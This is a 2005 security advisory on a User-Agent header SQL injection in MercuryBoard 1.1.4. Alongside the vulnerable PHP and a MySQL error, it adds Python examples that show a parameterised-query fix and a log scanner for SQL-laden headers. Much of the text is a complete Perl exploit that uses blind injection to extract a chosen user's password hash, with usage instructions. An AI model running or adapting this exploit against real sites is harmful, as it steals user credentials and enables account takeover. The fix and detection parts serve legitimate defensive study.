Thursday, June 23, 2005

[EXPL] MercuryBoard SQL Injection (User-Agent)

The following security advisory was sent to the SecuriTeam mailing list and can be found on the SecuriTeam web site: http://www.securiteam.com

MercuryBoard SQL Injection (User-Agent)
------------------------------------------------------------------------

SUMMARY

" <http://www.mercuryboard.com/> MercuryBoard is a powerful message board
system dedicated to raw speed with a mixture of features, ease of use, and
ease of customization coupled with expandability, and diverse language
services."

An SQL injection vulnerability in MercuryBoard allows a remote attacker to
inject arbitrary SQL statements through the User-Agent header, endangering
database integrity.

DETAILS

Vulnerable Systems:
* MercuryBoard version 1.1.4 and prior

Vulnerable code:

global.php, line 71 (the User-Agent header is taken from the request as-is):
    $this->agent = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : null;

index.php, line 154 (the same value is interpolated into the SQL text without escaping):
    $mercury->db->query("REPLACE INTO {$mercury->pre}active (active_id,
        active_action, active_item, active_time, active_ip, active_user_agent,
        active_session) VALUES ({$mercury->user['user_id']}, '{$mercury->get['a']}',
        $item, $mercury->time, '$mercury->ip', '$mercury->agent',
        '{$mercury->session['id']}')");
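The two snippets above show the whole bug: the header is read verbatim and pasted into the SQL text. The following is an added example, not MercuryBoard's code, that rebuilds that REPLACE query in Python on an in-memory SQLite table (SQLite is assumed in place of MySQL because it accepts the same REPLACE INTO form; the table and column names and the row values are taken from the query quoted in the advisory's error message). The vulnerable function interpolates the header like index.php does; the hardened function binds it as a parameter, so the same header is stored literally instead of becoming SQL.

```python
"""Added example, not MercuryBoard's own code: the REPLACE query from
index.php rebuilt on an in-memory SQLite table, once with the User-Agent
interpolated into the SQL text (the advisory's bug) and once bound as a
parameter (the fix). SQLite accepts the same REPLACE INTO syntax as MySQL."""
import sqlite3

SCHEMA = """
CREATE TABLE mb_active (
    active_id         INTEGER PRIMARY KEY,
    active_action     TEXT,
    active_item       INTEGER,
    active_time       INTEGER,
    active_ip         TEXT,
    active_user_agent TEXT,
    active_session    TEXT
);
"""

# Column values copied from the query quoted in the advisory's error message.
ACTIVE_ID, ACTION, ITEM, TIME = 1, "board", 0, 1116314234
IP, SESSION = "127.0.0.1", "aa3211413f374429d3830cd062b25b86"


def fresh_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def record_activity_vulnerable(conn, user_agent):
    """Same construction as index.php: the header becomes part of the SQL."""
    sql = (
        "REPLACE INTO mb_active (active_id, active_action, active_item, "
        "active_time, active_ip, active_user_agent, active_session) VALUES "
        f"({ACTIVE_ID}, '{ACTION}', {ITEM}, {TIME}, '{IP}', "
        f"'{user_agent}', '{SESSION}')"
    )
    conn.execute(sql)
    conn.commit()


def record_activity_safe(conn, user_agent):
    """Hardened form: the SQL is fixed text and the driver binds the values."""
    sql = (
        "REPLACE INTO mb_active (active_id, active_action, active_item, "
        "active_time, active_ip, active_user_agent, active_session) "
        "VALUES (?, ?, ?, ?, ?, ?, ?)"
    )
    conn.execute(sql, (ACTIVE_ID, ACTION, ITEM, TIME, IP, user_agent, SESSION))
    conn.commit()


def stored_user_agent(conn):
    row = conn.execute(
        "SELECT active_user_agent FROM mb_active WHERE active_id = ?",
        (ACTIVE_ID,),
    ).fetchone()
    return None if row is None else row[0]


def demo(user_agent):
    """Run both variants on the same header; returns (vulnerable, safe).

    The vulnerable result is the stored value, or the database's error text
    when the header broke the statement (the advisory's 1064 error)."""
    vuln = fresh_db()
    try:
        record_activity_vulnerable(vuln, user_agent)
        vulnerable = stored_user_agent(vuln)
    except sqlite3.OperationalError as err:
        vulnerable = f"SQL error: {err}"
    safe = fresh_db()
    record_activity_safe(safe, user_agent)
    return vulnerable, stored_user_agent(safe)


if __name__ == "__main__":
    # "666'" is the header that produced the error quoted in the advisory
    for ua in ("Mozilla/5.0 (X11; Linux) Gecko", "666'"):
        print(repr(ua), "->", demo(ua))
```

The point to take from the run is that the parameterised version does not need to know anything about quoting rules: the value `666'` is stored exactly as sent, so there is no statement text for it to terminate. Escaping the header with the driver's quoting function would also close this instance, but parameters are the form that stays correct when the next column is added.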

Error message:
..
You have an error in your SQL syntax. Check the manual that corresponds to
your MySQL server version for the right
syntax to use near 'aa3211413f374429d3830cd062b25b86')' at line 1
Query Error [1064]:
This type of error is reported by MySQL.
Query: REPLACE INTO mb_active (active_id, active_action, active_item,
active_time, active_ip, active_user_agent, active_session) VALUES (1,
'board', 0, 1116314234, '127.0.0.1', '666'',
'aa3211413f374429d3830cd062b25b86')
..
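From the defender's side, the evidence for this class of bug is a User-Agent header carrying SQL syntax, first in the web server's access log and then echoed back in an error like the one above. The following is an added example, not part of the advisory, that scans Apache/nginx combined-format access-log lines for such headers. All sample lines, addresses and timestamps are constructed; the last two carry headers shaped like the ones in this advisory (a stray quote, and a fragment that uses /**/ in place of whitespace around an inline SELECT). The regular expression and the indicator list are my own assumptions, not any product's rule.

```python
"""Added example (not from the advisory or MercuryBoard): a small scanner
over combined-format access-log lines that flags User-Agent values carrying
SQL syntax, the signal a defender has for header-based injection."""
import re

# Constructed sample lines in Apache "combined" format. Line 1 is a normal
# browser; lines 2 and 3 carry User-Agent values shaped like the advisory's.
SAMPLE_LOG = [
    "127.0.0.1 - - [17/May/2005:08:37:14 +0000] "
    "\"GET /mercuryboard/index.php?a=active HTTP/1.0\" 200 512 \"-\" "
    "\"Mozilla/5.0 (X11; Linux) Gecko\"",
    "127.0.0.1 - - [17/May/2005:08:37:20 +0000] "
    "\"GET /mercuryboard/index.php?a=active HTTP/1.0\" 200 1842 \"-\" "
    "\"666'\"",
    "127.0.0.1 - - [17/May/2005:08:37:25 +0000] "
    "\"GET /mercuryboard/index.php?a=active HTTP/1.0\" 200 1842 \"-\" "
    "\"666',''),(3, 'board', 0, (SELECT/**/1), 'x', 'x', 'x')/*\"",
]

# Combined log format; the User-Agent may contain backslash-escaped quotes.
COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" '
    r'"(?P<ua>(?:[^"\\]|\\.)*)"$'
)

# Indicators of SQL syntax in a header. A lone quote is weak evidence on its
# own (it does occur in odd clients), so severity rises with the count.
INDICATORS = {
    "quote": re.compile(r"'"),
    "sql_comment": re.compile(r"/\*|--\s"),
    "keyword": re.compile(
        r"\b(select|union|insert|update|delete|replace|where|between)\b", re.I
    ),
}


def suspicious_user_agent(ua):
    """Return the names of the indicators that match this User-Agent."""
    return [name for name, rx in INDICATORS.items() if rx.search(ua)]


def scan(lines):
    """Parse each line and report the ones whose User-Agent looks like SQL."""
    hits = []
    for lineno, line in enumerate(lines, 1):
        m = COMBINED.match(line)
        if not m:
            continue  # not combined format; a real pipeline would count these
        reasons = suspicious_user_agent(m["ua"])
        if reasons:
            hits.append({
                "line": lineno,
                "ip": m["ip"],
                "request": m["request"],
                "ua": m["ua"],
                "reasons": reasons,
                "severity": "high" if len(reasons) > 1 else "low",
            })
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f"line {hit['line']} [{hit['severity']}] {hit['ip']} "
              f"{hit['request']!r} UA={hit['ua']!r} reasons={hit['reasons']}")
```

Correlating a high-severity hit with a MySQL 1064 error in the application log for the same second is the strongest confirmation available without the payload itself; the error text quotes the whole failed statement, as the advisory's example shows, so the log entry also reveals exactly which column the header landed in.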

Exploit:
#!/usr/bin/perl

### MercuryBoard <=1.1.4, MySQL >= 4.1 sql injection exploit by RST/GHC
### ~~~~~~~~~~~~~~~~~~~~~~~~~~~
### * note: you first need to register on the forum to get an id and login,
###   then log out from the forum and run the exploit
### * note2: edit the timestamp in the source if the exploit does not work ;)
### ~~~~~~~~~~~~~~~~~~~~~~~~~~~
### (c)oded by 1dt.w0lf
### RST/GHC - http://rst.void.ru , http://ghc.ru
### ~~~~~~~~~~~~~~~~~~~~~~~~~~~

use IO::Socket;
use Getopt::Std;

getopts('h:f:b:i:l:p:');

$server    = $opt_h;
$path      = $opt_f;
$member_id = $opt_b;
$hacker_id = $opt_i;
$hacker_l  = $opt_l;
$prefix    = $opt_p || 'mb_';

if(!$server||!$path||!$member_id||!$hacker_id||!$hacker_l) { &usage; }

$server =~ s!(http:\/\/)!!;

$request  = 'http://';
$request .= $server;
$request .= $path;

$s_num = 1;   # position of the hash character being recovered
$|++;
$n = 0;       # request counter, drives the spinner
&head;
print "\r\n";
print " [~] SERVER       : $server\r\n";
print " [~] FORUM PATH   : $path\r\n";
print " [~] ID FOR BRUTE : $member_id\r\n";
print " [~] HACKER ID    : $hacker_id\r\n";
print " [~] HACKER LOGIN : $hacker_l\r\n";
print " [~] TABLE PREFIX : $prefix\r\n\r\n";
print " [~] SEARCHING PASSWORD ... [|]";

while(1)
{
    # hash characters are hex digits: try '0'-'9' first, then 'a'-'f'
    if(&found(47,58)==0) { &found(96,103); }
    $char = $i;
    if ($char=="0")
    {
        if(length($allchar) > 0){
            print qq{\b\b DONE ]

-------------------------------------------------------------------
 USER ID : $member_id
 HASH    : $allchar
-------------------------------------------------------------------
};
        }
        else
        {
            print "\b\b FAILED ]";
        }
        exit();
    }
    else
    {
        $allchar .= chr($char);
    }
    $s_num++;
}

# binary search over the character code range [$fmin, $fmax]
sub found($$)
{
    my $fmin = $_[0];
    my $fmax = $_[1];
    if (($fmax-$fmin)<5) { $i=crack($fmin,$fmax); return $i; }

    $r = int($fmax - ($fmax-$fmin)/2);
    $check = "/**/BETWEEN/**/$r/**/AND/**/$fmax";
    if ( &check($check) ) { &found($r,$fmax); }
    else { &found($fmin,$r); }
}

# linear search once the range is small
sub crack($$)
{
    my $cmin = $_[0];
    my $cmax = $_[1];
    $i = $cmin;
    while ($i<$cmax)
    {
        $crcheck = "=$i";
        if ( &check($crcheck) ) { return $i; }
        $i++;
    }
    $i = 0;
    return $i;
}

# one request; returns 1 if the injected condition held, 0 otherwise
sub check($)
{
    $n++;
    status();
    $ccheck = $_[0];

    $user_agent2 = "666',''),($hacker_id, 'board', 0, (SELECT/**/if((ascii("
                 . "substring((SELECT/**/user_password/**/FROM/**/${prefix}users"
                 . "/**/WHERE/**/user_id=$member_id),$s_num,1)))$ccheck, 1119336207,0)),"
                 . " '666.666.666.666', '666', '666')/*";

    $sock2 = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server",
                                    PeerPort => "80");
    printf $sock2 ("GET %s?a=active HTTP/1.0\nHost: %s\nUser-Agent: %s\nAccept: */*\nConnection: close\n\n",
                   $request, $server, $user_agent2);

    while(<$sock2>)
    {
        #print $_;
        if (/w=$hacker_id"\>$hacker_l/) { return 1; }
    }

    return 0;
}

sub status()
{
    $status = $n % 5;
    if($status==0){ print "\b\b/]"; }
    if($status==1){ print "\b\b-]"; }
    if($status==2){ print "\b\b\\]"; }
    if($status==3){ print "\b\b|]"; }
}

sub usage()
{
    &head;
    print q(
 USAGE
   r57mercury.pl [OPTIONS]

 OPTIONS
   -h [host]     ~ host where mercury board installed
   -f [/folder/] ~ folder where mercury board installed
   -b [user_id]  ~ user id for bruteforce
   -i [id]       ~ hacker id (hacker must be register on forum)
   -l [login]    ~ hacker login on forum
   -p [prefix]   ~ database tables prefix (optional)
                   default is "mb"
 E.G.
   r57mercury.pl -h www.blah.com -f /mercuryboard/ -b 2 -i 3 -l lamer
-------------------------------------------------------------------
 (c)oded by 1dt.w0lf
 RST/GHC , http://rst.void.ru , http://ghc.ru
);
    exit();
}

sub head()
{
    print q(
-------------------------------------------------------------------
 MercuryBoard <=1.1.4, MySQL >= 4.1 sql injection exploit by RST/GHC
-------------------------------------------------------------------
);
}

ADDITIONAL INFORMATION

The information has been provided by 1dt.w0lf.
The original exploit can be found at:
http://rst.void.ru/download/r57mercury.txt
The original advisory can be found at:
http://rst.void.ru/papers/advisory28.txt
